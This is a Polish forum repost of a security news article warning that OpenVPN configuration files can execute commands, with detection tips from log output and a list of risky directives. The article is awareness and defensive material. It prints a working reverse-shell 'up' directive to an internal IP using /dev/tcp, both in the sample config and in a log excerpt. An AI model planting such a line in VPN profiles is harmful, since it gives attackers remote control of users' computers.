Pliki konfiguracyjne OpenVPN mogą być niebezpieczne

[Grandalf]

Nazwijcie mnie cynikiem, ale jedną rzeczą której nauczyłem się podczas korzystania z Internetu jest podwójne sprawdzenie (jeśli nie potrójne), wszystkiego co pobierasz. Tak wiele plików do pobrania zawiera złośliwe oprogramowanie, oprogramowanie reklamowe i skrypty wykonujące złośliwe działania na komputerze, które muszą być dokładnie sprawdzane przed jego użyciem.

Kwestia ta została pokazana w artykule opublikowanym przez doświadczonego inżyniera inżynierii wstecznej

Zaloguj lub Zarejestruj się aby zobaczyć!

, gdzie pokazuje, jak normalnie nieszkodliwy plik konfiguracyjny VPN może być użyty do otwarcia backdoora na komputerze, który go używa.

Konfiguracje OpenVPN mogą wykonywać polecenia

W

Zaloguj lub Zarejestruj się aby zobaczyć!

Baines wyjaśnia, w jaki sposób prosty plik konfiguracyjny OpenVPN może być używany do wykonywania poleceń na komputerze, po nawiązaniu połączenia VPN. Możliwe jest również zaatakowanie dystrybucji plików konfiguracyjnych OpenVPN, które automatycznie wykonują polecenia, aby otworzyć backdoory za pomocą odwróconej powłoki lub wykonać inne niechciane zachowanie na komputerze.

OpenVPN to popularny program VPN typu open-source, który umożliwia tworzenie bezpiecznego i szyfrowanego połączenia sieciowego między komputerem lub urządzeniem, a inną siecią. Ze względu na swoją popularność został przeniesiony do pracy na różnych urządzeniach, w tym na routerach z uruchomionym DD-WRT. Aby to ułatwić, dostawcy VPN tworzą profile OpenVPN, które można pobrać i zainstalować w celu łatwego skonfigurowania połączenia VPN.

Według Baines'a, do tego wszystkiego, co musi zrobić napastnik, jest dodanie kilku linii do nieszkodliwego pliku konfiguracyjnego OpenVPN (.opvpn), aby uczynić go złośliwym. W przykładzie Bainesa plik konfiguracyjny OpenVPN jest po prostu plikiem tekstowym z kilkoma komendami:

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun

Jeśli napastnik chciałby spowodować, aby plik konfiguracyjny OpenVPN wykonał polecenie, dodałby linię "

Zaloguj lub Zarejestruj się aby zobaczyć!

", która pozwala na wykonanie skryptów zdefiniowanych przez użytkownika, oraz wpis "up", który zawiera polecenie wykonane po po nawiązaniu połączenia. Jako przykład zmienił powyższy plik konfiguracyjny, aby wykonał polecenie, jak pokazano poniżej.

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”

Kiedy ten plik konfiguracyjny będzie użyty, po ustanowieniu połączenia OpenVPN wykona powyższe polecenie i otworzy odwróconą powłokę na komputerze pod adresem 192.168.1.218. Umożliwi to atakującemu na ten adres IP wykonywanie poleceń na komputerze zdalnym, na którym działa plik konfiguracyjny OpenVPN.

Baines pokazuje nawet, jak można przenieść powyższą metodę, aby zaatakować użytkowników systemu Windows za pomocą skryptu PowerShell.

Chociaż pokazuje, że powinieneś być ostrożny przy pobieraniu konfiguracji OpenVPN od stron trzecich, Baines powiedział BleepingComputer, że nie znalazł obecnie żadnych złośliwych konfiguracji w sieci.

Jak wykrywać złośliwe pliki konfiguracyjne OpenVPN?

Thu Jun 7 12:28:23 2018 NOTE: the current — script-security setting may allow this configuration to call user-defined scripts
Thu Jun 7 12:28:23 2018 /bin/bash -c /bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1& tun0 1500 1500 10.200.0.2 10.200.0.1 init

Jeśli widzisz powyższe linie w swoim logu, oznacza to, że zostało użyte polecenie "script-security 2", które pozwala na wykonanie skryptów zdefiniowanych przez użytkownika. Ponieważ ta linia jest wymagana do uruchamiania skryptów, wynikałoby z tego, że plik konfiguracyjny coś wykonuje. Powinieneś być w stanie rozpoznać wykonywane polecenie, jak pokazano w drugim wierszu w powyższym logu.

Ponieważ pliki konfiguracyjne OpenVPN są po prostu plikami tekstowymi, możesz również sprawdzić, czy konfiguracja OpenVPN jest złośliwa, otwierając plik w Notatniku lub innym edytorze tekstów. Umożliwi to zobaczenie całego pliku konfiguracyjnego i sprawdzenie, czy jakiekolwiek polecenia są wykonywane.

Niestety, OpenVPN ma inne dyrektywy konfiguracyjne, które mogą wykonywać polecenia, a Baines zaleca, aby użytkownicy korzystali z

Zaloguj lub Zarejestruj się aby zobaczyć!

OpenVPN, który może odfiltrowywać tego typu polecenia.

"Niestety, polecenie "up" to nie jedyne polecenie, które może być użyte w ten sposób" - powiedział Baines dla BleepingComputer. Istnieją jeszcze inne, takie jak: "Up, down, client-connect, learn-address, auth-user-pass-verify, i learn-address" (choć niektóre z nich są specyficzne dla serwera). Osoba niedoświadczona może próbować przejrzeć i zrozumieć plik konfiguracyjny, ale myślę, że bezpieczniej jest używać klienta takiego jak viscosity, który po prostu odfiltrowuje to zachowanie. "

źródło:

Zaloguj lub Zarejestruj się aby zobaczyć!